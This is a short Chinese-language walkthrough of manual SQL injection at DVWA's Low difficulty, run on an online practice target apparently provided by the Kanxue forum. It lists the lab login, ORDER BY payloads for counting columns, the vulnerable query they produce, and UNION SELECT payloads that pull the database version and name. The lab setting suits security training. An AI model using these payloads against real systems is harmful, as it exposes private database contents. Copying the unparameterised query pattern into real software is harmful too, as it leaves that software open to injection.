本次使用的靶机是看雪论坛为我们提供的在线靶机
账号:admin
密码:password
一:Low级别注入
1. 先在文本框中输入1,单击submit,查看效果
手注的思路:确定页面使用了多少个字段,然后确定各个字段的位置,最后构造SQL语句进行注入
2. 在文本框中输入 1' order by 2# 返回正常 1'order by 3# 报错,说明有两个字段
此时带入查询的语句是:
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '1'order by 2#'";
3. first name后面显示的是第一个字段的,surname后面显示的第二个字段。现在确定了字段的位置,有两个位置可以进行注入,构造我们自己的SQL语句进行注入
1' union select 1,version()#
1' union select database(),2#